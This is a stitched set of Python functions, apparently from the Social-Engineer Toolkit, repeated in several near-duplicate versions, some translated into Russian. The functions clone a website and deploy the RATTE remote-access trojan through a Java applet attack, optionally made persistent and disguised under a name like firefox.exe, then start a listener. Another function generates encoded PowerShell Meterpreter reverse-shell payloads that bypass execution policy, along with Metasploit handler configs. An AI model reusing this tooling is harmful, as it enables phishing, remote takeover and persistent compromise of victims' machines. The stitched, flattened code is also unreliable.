def main(): valid_site = False valid_ip = False valid_persistence = False input_counter= 0 site_input_counter=0 #pause=raw_input("This module has finished completing. Press <enter> to continue") # Get a *VALID* website address while valid_site != True and site_input_counter < 3: website = raw_input(core.setprompt(["9", "2"], "Enter website to clone (ex. https://gmail.com)")) site = urlparse.urlparse(website) if site.scheme == "http" or site.scheme == "https": if site.netloc != "": valid_site = True else: if site_input_counter == 2: core.print_error("\nMaybe you have the address written down wrong?" + core.bcolors.ENDC) sleep(4) return else: core.print_warning("I can't determine the fqdn or IP of the site. Try again?") site_input_counter += 1 else: if site_input_counter == 2: core.print_error("\nMaybe you have the address written down wrong?") sleep(4) return else: core.print_warning("I couldn't determine whether this is an http or https site. Try again?") site_input_counter +=1 #core.DebugInfo("site.scheme is: %s " % site.scheme) #core.DebugInfo("site.netloc is: %s " % site.netloc) #core.DebugInfo("site.path is: %s " % site.path) #core.DebugInfo("site.params are: %s " % site.params) #core.DebugInfo("site.query is: %s " % site.query) #core.DebugInfo("site.fragment is: %s " % site.fragment) while valid_ip != True and input_counter < 3: ipaddr = raw_input(core.setprompt(["9", "2"], "Enter the IP address to connect back on")) valid_ip = core.validate_ip(ipaddr) if not valid_ip: if input_counter == 2: core.print_error("\nMaybe you have the address written down wrong?") sleep(4) return else: input_counter += 1 #javaport must be 80, cause applet uses in web injection port 80 to download payload! try: javaport = int(raw_input(core.setprompt(["9", "2"], "Port Java applet should listen on [80]"))) while javaport == 0 or javaport > 65535: if javaport == 0: core.print_warning(text.PORT_NOT_ZERO) if javaport > 65535: core.print_warning(text.PORT_TOO_HIGH) javaport = int(raw_input(core.setprompt(["9", "2"],"Port Java applet should listen on [80]"))) except ValueError: #core.print_info("Port set to default of 80") javaport = 80 #javaport=80 try: ratteport = int(raw_input(core.setprompt(["9", "2"], "Port RATTE Server should listen on [8080]"))) while ratteport == javaport or ratteport == 0 or ratteport > 65535: if ratteport == javaport: core.print_warning("Port must not be equal to javaport!") if ratteport == 0: core.print_warning(text.PORT_NOT_ZERO) if ratteport > 65535: core.print_warning(text.PORT_TOO_HIGH) ratteport = int(raw_input(core.setprompt(["9", "2"], "Port RATTE Server should listen on [8080]"))) except ValueError: ratteport = 8080 persistent = core.yesno_prompt(["9","2"], "Should RATTE be persistentententent [no|yes]?") # j0fer 06-27-2012 # while valid_persistence != True: # j0fer 06-27-2012 # persistent=raw_input(core.setprompt(["9", "2"], "Should RATTE be persistent [no|yes]?")) # j0fer 06-27-2012 # persistent=str.lower(persistent) # j0fer 06-27-2012 # if persistent == "no" or persistent == "n": # j0fer 06-27-2012 # persistent="NO" # j0fer 06-27-2012 # valid_persistence = True # j0fer 06-27-2012 # elif persistent == "yes" or persistent == "y": # j0fer 06-27-2012 # persistent="YES" # j0fer 06-27-2012 # valid_persistence = True # j0fer 06-27-2012 # else: # j0fer 06-27-2012 # core.print_warning(text.YES_NO_RESPONSES) customexe=raw_input(core.setprompt(["9", "2"], "Use specifix filename (ex. firefox.exe) [filename.exe or empty]?")) ####################################### # prepare RATTE ####################################### prepare_ratte(ipaddr,ratteport,persistent,customexe) ###################################### # Java Applet Attack to deploy RATTE ####################################### core.print_info("Starting java applet attack...") java_applet_attack_tw(website,javaport, "reports/",ipaddr) fileopen=file("%s/src/program_junk/rand_gen" % (definepath), "r") for line in fileopen: ratte_random = line.rstrip() subprocess.Popen("cp %s/src/program_junk/ratteM.exe %s/reports/%s" % (definepath,definepath,ratte_random), shell=True).wait() ####################### # start ratteserver ####################### core.print_info("Starting ratteserver...") ratte_listener_start(ratteport) ###################### # stop webserver ###################### stop_web_server_tw() return
def main(): valid_site = False valid_ip = False valid_persistence = False input_counter = 0 site_input_counter = 0 #pause=raw_input("This module has finished completing. Press <enter> to continue") # Get a *VALID* website address while valid_site != True and site_input_counter < 3: website = raw_input( core.setprompt(["9", "2"], "Enter website to clone (ex. https://gmail.com)")) site = urlparse.urlparse(website) if site.scheme == "http" or site.scheme == "https": if site.netloc != "": valid_site = True else: if site_input_counter == 2: core.print_error( "\nMaybe you have the address written down wrong?" + core.bcolors.ENDC) sleep(4) return else: core.print_warning( "I can't determine the fqdn or IP of the site. Try again?" ) site_input_counter += 1 else: if site_input_counter == 2: core.print_error( "\nMaybe you have the address written down wrong?") sleep(4) return else: core.print_warning( "I couldn't determine whether this is an http or https site. Try again?" ) site_input_counter += 1 #core.DebugInfo("site.scheme is: %s " % site.scheme) #core.DebugInfo("site.netloc is: %s " % site.netloc) #core.DebugInfo("site.path is: %s " % site.path) #core.DebugInfo("site.params are: %s " % site.params) #core.DebugInfo("site.query is: %s " % site.query) #core.DebugInfo("site.fragment is: %s " % site.fragment) while valid_ip != True and input_counter < 3: ipaddr = raw_input( core.setprompt(["9", "2"], "Enter the IP address to connect back on")) valid_ip = core.validate_ip(ipaddr) if not valid_ip: if input_counter == 2: core.print_error( "\nMaybe you have the address written down wrong?") sleep(4) return else: input_counter += 1 #javaport must be 80, cause applet uses in web injection port 80 to download payload! try: javaport = int( raw_input( core.setprompt(["9", "2"], "Port Java applet should listen on [80]"))) while javaport == 0 or javaport > 65535: if javaport == 0: core.print_warning(text.PORT_NOT_ZERO) if javaport > 65535: core.print_warning(text.PORT_TOO_HIGH) javaport = int( raw_input( core.setprompt(["9", "2"], "Port Java applet should listen on [80]"))) except ValueError: #core.print_info("Port set to default of 80") javaport = 80 #javaport=80 try: ratteport = int( raw_input( core.setprompt(["9", "2"], "Port RATTE Server should listen on [8080]"))) while ratteport == javaport or ratteport == 0 or ratteport > 65535: if ratteport == javaport: core.print_warning("Port must not be equal to javaport!") if ratteport == 0: core.print_warning(text.PORT_NOT_ZERO) if ratteport > 65535: core.print_warning(text.PORT_TOO_HIGH) ratteport = int( raw_input( core.setprompt( ["9", "2"], "Port RATTE Server should listen on [8080]"))) except ValueError: ratteport = 8080 persistent = core.yesno_prompt( ["9", "2"], "Should RATTE be persistentententent [no|yes]?") # j0fer 06-27-2012 # while valid_persistence != True: # j0fer 06-27-2012 # persistent=raw_input(core.setprompt(["9", "2"], "Should RATTE be persistent [no|yes]?")) # j0fer 06-27-2012 # persistent=str.lower(persistent) # j0fer 06-27-2012 # if persistent == "no" or persistent == "n": # j0fer 06-27-2012 # persistent="NO" # j0fer 06-27-2012 # valid_persistence = True # j0fer 06-27-2012 # elif persistent == "yes" or persistent == "y": # j0fer 06-27-2012 # persistent="YES" # j0fer 06-27-2012 # valid_persistence = True # j0fer 06-27-2012 # else: # j0fer 06-27-2012 # core.print_warning(text.YES_NO_RESPONSES) customexe = raw_input( core.setprompt([ "9", "2" ], "Use specifix filename (ex. firefox.exe) [filename.exe or empty]?")) ####################################### # prepare RATTE ####################################### prepare_ratte(ipaddr, ratteport, persistent, customexe) ###################################### # Java Applet Attack to deploy RATTE ####################################### core.print_info("Starting java applet attack...") java_applet_attack_tw(website, javaport, "reports/", ipaddr) fileopen = file("%s/src/program_junk/rand_gen" % (definepath), "r") for line in fileopen: ratte_random = line.rstrip() subprocess.Popen("cp %s/src/program_junk/ratteM.exe %s/reports/%s" % (definepath, definepath, ratte_random), shell=True).wait() ####################### # start ratteserver ####################### core.print_info("Starting ratteserver...") ratte_listener_start(ratteport) ###################### # stop webserver ###################### stop_web_server_tw() return
def main(): valid_site = False valid_ip = False valid_response = False input_counter = 0 ################# # get User Input ################# # ipaddr=input(setprompt(["9", "2"], "IP address to connect back on")) while valid_ip != True and input_counter < 3: ipaddr = input(core.setprompt(["9", "2"], "Enter the IP address to connect back on")) valid_ip = core.validate_ip(ipaddr) if not valid_ip: if input_counter == 2: core.print_error("\nMaybe you have the address written down wrong?") sleep(4) return else: input_counter += 1 # try: # ratteport=int(input(setprompt(["9", "2"], "Port RATTE Server should listen on"))) # while ratteport==0 or ratteport > 65535: # print_warning('Port must not be equal to javaport!') # ratteport=int(input(setprompt(["9", "2"], "Enter port RATTE Server should listen on"))) # except ValueError: # ratteport=8080 try: ratteport = int(input(core.setprompt(["9", "2"], "Port RATTE Server should listen on [8080]"))) while ratteport == 0 or ratteport > 65535: if ratteport == 0: core.print_warning(text.PORT_NOT_ZERO) if ratteport > 65535: core.print_warning(text.PORT_TOO_HIGH) ratteport = int(input(core.setprompt(["9", "2"], "Enter port RATTE Server should listen on [8080]"))) except ValueError: # core.print_info("Port set to default of 8080") ratteport = 8080 # persistent=input(setprompt(["9", "2"], "Should RATTE be persistent [no|yes]?")) # if persistent == 'no' or persistent == '' or persistent == 'n': # persistent='NO' # else: # persistent='YES' while not valid_response: persistent = input(core.setprompt(["9", "2"], "Should RATTE be persistent [no|yes]?")) persistent = str.lower(persistent) if persistent == "no" or persistent == "n": persistent = "NO" valid_response = True elif persistent == "yes" or persistent == "y": persistent = "YES" valid_response = True else: core.print_warning(text.YES_NO_RESPONSES) valid_response = False customexe = input(core.setprompt(["9", "2"], "Use specifix filename (ex. firefox.exe) [filename.exe or empty]?")) ############ # prepare RATTE ############ prepare_ratte(ipaddr, ratteport, persistent, customexe) core.print_status("Payload has been exported to %s" % os.path.join(core.setdir + "ratteM.exe")) ################### # start ratteserver ################### # prompt=input(setprompt(["9", "2"], "Start the ratteserver listener now [yes|no]")) # if prompt == "yes" or prompt == "" or prompt == "y": # print_info("Starting ratteserver...") # ratte_listener_start(ratteport) while not valid_response: prompt = input(core.setprompt(["9", "2"], "Start the ratteserver listener now [yes|no]")) prompt = str.lower(prompt) if prompt == "no" or prompt == "n": # prompt = "NO" core.print_error("Aborting...") sleep(2) valid_response = True elif prompt == "yes" or prompt == "y": core.print_info("Starting ratteserver...") ratte_listener_start(ratteport) core.print_info("Stopping ratteserver...") sleep(2) valid_response = True else: core.print_warning("valid responses are 'n|y|N|Y|no|yes|No|Yes|NO|YES'")
def main(): valid_site = False valid_ip = False valid_response = False input_counter = 0 ################# # get User Input ################# # ipaddr=input(setprompt(["9", "2"], "IP address to connect back on")) while valid_ip != True and input_counter < 3: ipaddr = input( core.setprompt(["9", "2"], "Enter the IP address to connect back on")) valid_ip = core.validate_ip(ipaddr) if not valid_ip: if input_counter == 2: core.print_error( "\nMaybe you have the address written down wrong?") sleep(4) return else: input_counter += 1 # try: # ratteport=int(input(setprompt(["9", "2"], "Port RATTE Server should listen on"))) # while ratteport==0 or ratteport > 65535: # print_warning('Port must not be equal to javaport!') # ratteport=int(input(setprompt(["9", "2"], "Enter port RATTE Server should listen on"))) # except ValueError: # ratteport=8080 try: ratteport = int( input( core.setprompt(["9", "2"], "Port RATTE Server should listen on [8080]"))) while ratteport == 0 or ratteport > 65535: if ratteport == 0: core.print_warning(text.PORT_NOT_ZERO) if ratteport > 65535: core.print_warning(text.PORT_TOO_HIGH) ratteport = int( input( core.setprompt( ["9", "2"], "Enter port RATTE Server should listen on [8080]"))) except ValueError: # core.print_info("Port set to default of 8080") ratteport = 8080 # persistent=input(setprompt(["9", "2"], "Should RATTE be persistent [no|yes]?")) # if persistent == 'no' or persistent == '' or persistent == 'n': # persistent='NO' # else: # persistent='YES' while not valid_response: persistent = input( core.setprompt(["9", "2"], "Should RATTE be persistent [no|yes]?")) persistent = str.lower(persistent) if persistent == "no" or persistent == "n": persistent = "NO" valid_response = True elif persistent == "yes" or persistent == "y": persistent = "YES" valid_response = True else: core.print_warning(text.YES_NO_RESPONSES) valid_response = False customexe = input( core.setprompt([ "9", "2" ], "Use specifix filename (ex. firefox.exe) [filename.exe or empty]?")) ############ # prepare RATTE ############ prepare_ratte(ipaddr, ratteport, persistent, customexe) core.print_status("Payload has been exported to %s" % os.path.join(core.userconfigpath, "ratteM.exe")) ################### # start ratteserver ################### # prompt=input(setprompt(["9", "2"], "Start the ratteserver listener now [yes|no]")) # if prompt == "yes" or prompt == "" or prompt == "y": # print_info("Starting ratteserver...") # ratte_listener_start(ratteport) while not valid_response: prompt = input( core.setprompt(["9", "2"], "Start the ratteserver listener now [yes|no]")) prompt = str.lower(prompt) if prompt == "no" or prompt == "n": # prompt = "NO" core.print_error("Aborting...") sleep(2) valid_response = True elif prompt == "yes" or prompt == "y": core.print_info("Starting ratteserver...") ratte_listener_start(ratteport) core.print_info("Stopping ratteserver...") sleep(2) valid_response = True else: core.print_warning( "valid responses are 'n|y|N|Y|no|yes|No|Yes|NO|YES'")
def main(): valid_site = False valid_ip = False # valid_persistence = False input_counter = 0 site_input_counter = 0 ipaddr = None website = None # pause=input("This module has finished completing. Press <enter> to continue") # Get a *VALID* website address while not valid_site and site_input_counter < 3: website = input(core.setprompt(["9", "2"], "Enter website to clone (ex. https://gmail.com)")) site = urlparse(website) if site.scheme == "http" or site.scheme == "https": if site.netloc != "": valid_site = True else: if site_input_counter == 2: core.print_error("\nМожет быть, вы неправильно записали адрес?" + core.bcolors.ENDC) sleep(4) return else: core.print_warning("Я не могу определить fqdn или IP сайта. Попробуй снова?") site_input_counter += 1 else: if site_input_counter == 2: core.print_error("\nМожет быть, вы неправильно записали адрес?") sleep(4) return else: core.print_warning("Я не мог определить, является ли это http или https сайтом. Попробуй снова?") site_input_counter += 1 # core.DebugInfo("site.scheme is: %s " % site.scheme) # core.DebugInfo("site.netloc is: %s " % site.netloc) # core.DebugInfo("site.path is: %s " % site.path) # core.DebugInfo("site.params are: %s " % site.params) # core.DebugInfo("site.query is: %s " % site.query) # core.DebugInfo("site.fragment is: %s " % site.fragment) while not valid_ip and input_counter < 3: ipaddr = input(core.setprompt(["9", "2"], "Введите IP-адрес для подключения")) valid_ip = core.validate_ip(ipaddr) if not valid_ip: if input_counter == 2: core.print_error("\nМожет быть, вы неправильно записали адрес?") sleep(4) return else: input_counter += 1 # javaport must be 80, cause applet uses in web injection port 80 to download payload! try: javaport = int(input(core.setprompt(["9", "2"], "Апплет порта Java должен слушать [80]"))) while javaport == 0 or javaport > 65535: if javaport == 0: core.print_warning(text.PORT_NOT_ZERO) if javaport > 65535: core.print_warning(text.PORT_TOO_HIGH) javaport = int(input(core.setprompt(["9", "2"], "Апплет порта Java должен слушать [80]"))) except ValueError: # core.print_info("Port set to default of 80") javaport = 80 try: ratteport = int(input(core.setprompt(["9", "2"], "Сервер RATTE порта должен слушать [8080]"))) while ratteport == javaport or ratteport == 0 or ratteport > 65535: if ratteport == javaport: core.print_warning("Порт не должен быть равен javaport!") if ratteport == 0: core.print_warning(text.PORT_NOT_ZERO) if ratteport > 65535: core.print_warning(text.PORT_TOO_HIGH) ratteport = int(input(core.setprompt(["9", "2"], "Сервер RATTE порта должен слушать [8080]"))) except ValueError: ratteport = 8080 persistent = core.yesno_prompt(["9", "2"], "Должен ли RATTE быть постоянным [no|yes]?") # j0fer 06-27-2012 # while valid_persistence != True: # j0fer 06-27-2012 # persistent=input(core.setprompt(["9", "2"], "Should RATTE be persistent [no|yes]?")) # j0fer 06-27-2012 # persistent=str.lower(persistent) # j0fer 06-27-2012 # if persistent == "no" or persistent == "n": # j0fer 06-27-2012 # persistent="NO" # j0fer 06-27-2012 # valid_persistence = True # j0fer 06-27-2012 # elif persistent == "yes" or persistent == "y": # j0fer 06-27-2012 # persistent="YES" # j0fer 06-27-2012 # valid_persistence = True # j0fer 06-27-2012 # else: # j0fer 06-27-2012 # core.print_warning(text.YES_NO_RESPONSES) customexe = input(core.setprompt(["9", "2"], "Используйте конкретное имя файла (например, firefox.exe) [filename.exe или пусто]? ")) ####################################### # prepare RATTE ####################################### prepare_ratte(ipaddr, ratteport, persistent, customexe) ###################################### # Java Applet Attack to deploy RATTE ####################################### core.print_info("Запуск атаки Java-апплета..") java_applet_attack_tw(website, javaport, "reports/", ipaddr) with open(os.path.join(userconfigpath, definepath, "/rand_gen")) as fileopen: for line in fileopen: ratte_random = line.rstrip() subprocess.Popen("cp %s/ratteM.exe %s/reports/%s" % (os.path.join(userconfigpath, definepath), definepath, ratte_random), shell=True).wait() ####################### # start ratteserver ####################### core.print_info("Стартовый ратсервер...") ratte_listener_start(ratteport) ###################### # stop webserver ###################### stop_web_server_tw() return
def prep_powershell_payload(): # grab stage encoding flag stage_encoding = core.check_config("STAGE_ENCODING=").lower() if stage_encoding == "off": stage_encoding = "false" else: stage_encoding = "true" # check to see if we are just generating powershell code powershell_solo = core.check_options("POWERSHELL_SOLO") # check if port is there port = core.check_options("PORT=") # check if we are using auto_migrate auto_migrate = core.check_config("AUTO_MIGRATE=") # check if we are using pyinjection pyinjection = core.check_options("PYINJECTION=") if pyinjection == "ON": # check to ensure that the payload options were specified right if os.path.isfile(os.path.join(core.setdir, "payload_options.shellcode")): pyinjection = "on" core.print_status("Multi/Pyinjection was specified. Overriding config options.") else: pyinjection = "off" # grab ipaddress if core.check_options("IPADDR=") != 0: ipaddr = core.check_options("IPADDR=") else: ipaddr = input("Enter the ipaddress for the reverse connection: ") core.update_options("IPADDR=" + ipaddr) # check to see if we are using multi powershell injection multi_injection = core.check_config("POWERSHELL_MULTI_INJECTION=").lower() # turn off multi injection if pyinjection is specified if pyinjection == "on": multi_injection = "off" # check what payloads we are using powershell_inject_x86 = core.check_config("POWERSHELL_INJECT_PAYLOAD_X86=") # if we specified a hostname then default to reverse https/http if not core.validate_ip(ipaddr): powershell_inject_x86 = "windows/meterpreter/reverse_http" # prompt what port to listen on for powershell then make an append to the current # metasploit answer file if os.path.isfile(os.path.join(core.setdir, "meta_config_multipyinjector")): # if we have multi injection on, don't worry about these if multi_injection != "on" and pyinjection == "off": core.print_status("POWERSHELL_INJECTION is set to ON with multi-pyinjector") port = input(core.setprompt(["4"], "Enter the port for Metasploit to listen on for powershell [443]")) if not port: port = "443" with open(os.path.join(core.setdir, "meta_config_multipyinjector")) as fileopen: data = fileopen.read() match = re.search(port, data) if not match: with open(os.path.join(core.setdir, "meta_config_multipyinjector"), "a") as filewrite: filewrite.write("\nuse exploit/multi/handler\n") if auto_migrate == "ON": filewrite.write("set AutoRunScript post/windows/manage/smart_migrate\n") filewrite.write("set PAYLOAD {0}\n" "set LHOST {1}\n" "set LPORT {2}\n" "set EnableStageEncoding {3}\n" "set ExitOnSession false\n" "exploit -j\n".format(powershell_inject_x86, ipaddr, port, stage_encoding)) # if we have multi injection on, don't worry about these if multi_injection != "on" and pyinjection == "off": # check to see if the meta config multi pyinjector is there if not os.path.isfile(os.path.join(core.setdir, "meta_config_multipyinjector")): if core.check_options("PORT=") != 0: port = core.check_options("PORT=") # if port.options isnt there then prompt else: port = input(core.setprompt(["4"], "Enter the port for Metasploit to listen on for powershell [443]")) if not port: port = "443" core.update_options("PORT={0}".format(port)) # turn off multi_injection if we are riding solo from the powershell menu if powershell_solo == "ON": multi_injection = "off" pyinjection = "on" # if we are using multi powershell injection if multi_injection == "on" and pyinjection == "off": core.print_status("Multi-Powershell-Injection is set to ON, this should be sweet...") # define a base variable x86 = "" # specify a list we will use for later multi_injection_x86 = "" # here we do some funky loops so we don't need to rewrite the code below if multi_injection == "on": port = core.check_config("POWERSHELL_MULTI_PORTS=") port = port.split(",") if multi_injection == "on": # iterate through the ports, used for POWERSHELL_MULTI_PORTS for ports in port: # dont cycle through if theres a blank if ports: core.print_status("Generating x86-based powershell injection code for port: {0}".format(ports)) multi_injection_x86 = multi_injection_x86 + "," + core.generate_powershell_alphanumeric_payload(powershell_inject_x86, ipaddr, ports, x86) if os.path.isfile(os.path.join(core.setdir, "meta_config_multipyinjector")): port_check = core.check_ports(os.path.join(core.setdir, "meta_config_multipyinjector"), ports) if not port_check: with open(os.path.join(core.setdir, "meta_config_multipyinjector"), "a") as filewrite: filewrite.write("\nuse exploit/multi/handler\n") if auto_migrate == "ON": filewrite.write("set AutoRunScript post/windows/manage/smart_migrate\n") filewrite.write("set PAYLOAD {0}\n" "set LHOST {1}\n" "set EnableStageEncoding {2}\n" "set LPORT {3}\n" "set ExitOnSession false\n" "exploit -j\n\n".format(powershell_inject_x86, ipaddr, stage_encoding, ports)) # if we aren't using multi pyinjector if not os.path.isfile(os.path.join(core.setdir, "meta_config_multipyinjector")): # if meta config isn't created yet then create it if not os.path.isfile(): with open(os.path.join(core.setdir, "meta_config"), "w") as filewrite: filewrite.write("") port_check = core.check_ports(os.path.join(core.setdir, "meta_config"), ports) if not port_check: with open(os.path.join(core.setdir, "meta_config"), "a") as filewrite: filewrite.write("\nuse exploit/multi/handler\n") if auto_migrate == "ON": filewrite.write("set AutoRunScript post/windows/manage/smart_migrate\n") filewrite.write("set PAYLOAD {0}\n" "set LHOST {1}\n" "set EnableStageEncoding {2}\n" "set ExitOnSession false\n" "set LPORT {3}\n" "exploit -j\n\n".format(powershell_inject_x86, ipaddr, stage_encoding, ports)) # here we do everything if pyinjection or multi pyinjection was specified if pyinjection == "on": injections = [] # read in the file we need for parsing with open(os.path.join(core.setdir, "payload_options.shellcode")) as fileopen: payloads = fileopen.read()[:-1].rstrip() # strips an extra , payloads = payloads.split(",") # format: payload<space>port for payload in payloads: # format: payload<space>port payload = payload.split(" ") powershell_inject_x86 = payload[0] port = payload[1] core.print_status("Generating x86-based powershell injection code...") injections.append(core.generate_powershell_alphanumeric_payload(powershell_inject_x86, ipaddr, port, x86)) multi_injection_x86 = ",".join(injections) # if its turned to off if multi_injection == "off" and pyinjection == "off": core.print_status("Generating x86-based powershell injection code...") x86 = core.generate_powershell_alphanumeric_payload(powershell_inject_x86, ipaddr, port, x86) # if we are specifying multi powershell injection if multi_injection == "on" or pyinjection == "on": x86 = multi_injection_x86[1:] # remove comma at beginning # check to see if we want to display the powershell command to the user verbose = core.check_config("POWERSHELL_VERBOSE=") if verbose.lower() == "on": core.print_status("Printing the x86 based encoded code...") time.sleep(3) print(x86) with open(os.path.join(core.setdir, "x86.powershell"), "w") as filewrite: filewrite.write(x86) core.print_status("Finished generating powershell injection bypass.") core.print_status("Encoded to bypass execution restriction policy...")
def main(): valid_site = False valid_ip = False valid_response = False input_counter = 0 ################# # get User Input ################# # ipaddr=input(setprompt(["9", "2"], "IP address to connect back on")) while valid_ip != True and input_counter < 3: ipaddr = input( core.setprompt(["9", "2"], "Введите IP-адрес для подключения")) valid_ip = core.validate_ip(ipaddr) if not valid_ip: if input_counter == 2: core.print_error( "\nМожет быть, вы неправильно написали адрес?") sleep(4) return else: input_counter += 1 # try: # ratteport=int(input(setprompt(["9", "2"], "Port RATTE Server should listen on"))) # while ratteport==0 or ratteport > 65535: # print_warning('Port must not be equal to javaport!') # ratteport=int(input(setprompt(["9", "2"], "Enter port RATTE Server should listen on"))) # except ValueError: # ratteport=8080 try: ratteport = int( input( core.setprompt( ["9", "2"], "Порт RATTE Server должен прослушивать [8080]"))) while ratteport == 0 or ratteport > 65535: if ratteport == 0: core.print_warning(text.PORT_NOT_ZERO) if ratteport > 65535: core.print_warning(text.PORT_TOO_HIGH) ratteport = int( input( core.setprompt( ["9", "2"], "Введите порт RATTE Сервер должен прослушивать [8080]") )) except ValueError: # core.print_info("Port set to default of 8080") ratteport = 8080 # persistent=input(setprompt(["9", "2"], "Should RATTE be persistent [no|yes]?")) # if persistent == 'no' or persistent == '' or persistent == 'n': # persistent='NO' # else: # persistent='YES' while not valid_response: persistent = input( core.setprompt(["9", "2"], "Должен ли RATTE быть постоянным [no|yes]?")) persistent = str.lower(persistent) if persistent == "no" or persistent == "n": persistent = "NO" valid_response = True elif persistent == "yes" or persistent == "y": persistent = "YES" valid_response = True else: core.print_warning(text.YES_NO_RESPONSES) valid_response = False customexe = input( core.setprompt([ "9", "2" ], "Используйте конкретное имя файла (например, firefox.exe) [filename.exe или пусто]?" )) ############ # prepare RATTE ############ prepare_ratte(ipaddr, ratteport, persistent, customexe) core.print_status("Полезная нагрузка была экспортирована в %s" % os.path.join(core.userconfigpath, "ratteM.exe")) ################### # start ratteserver ################### # prompt=input(setprompt(["9", "2"], "Start the ratteserver listener now [yes|no]")) # if prompt == "yes" or prompt == "" or prompt == "y": # print_info("Starting ratteserver...") # ratte_listener_start(ratteport) while not valid_response: prompt = input( core.setprompt(["9", "2"], "Запустите слушатель ratteserver сейчас [yes|no]")) prompt = str.lower(prompt) if prompt == "no" or prompt == "n": # prompt = "NO" core.print_error("Aborting...") sleep(2) valid_response = True elif prompt == "yes" or prompt == "y": core.print_info("Старт ратсервер...") ratte_listener_start(ratteport) core.print_info("Остановка ратсервера...") sleep(2) valid_response = True else: core.print_warning( "действительные ответы 'n|y|N|Y|no|yes|No|Yes|NO|YES'")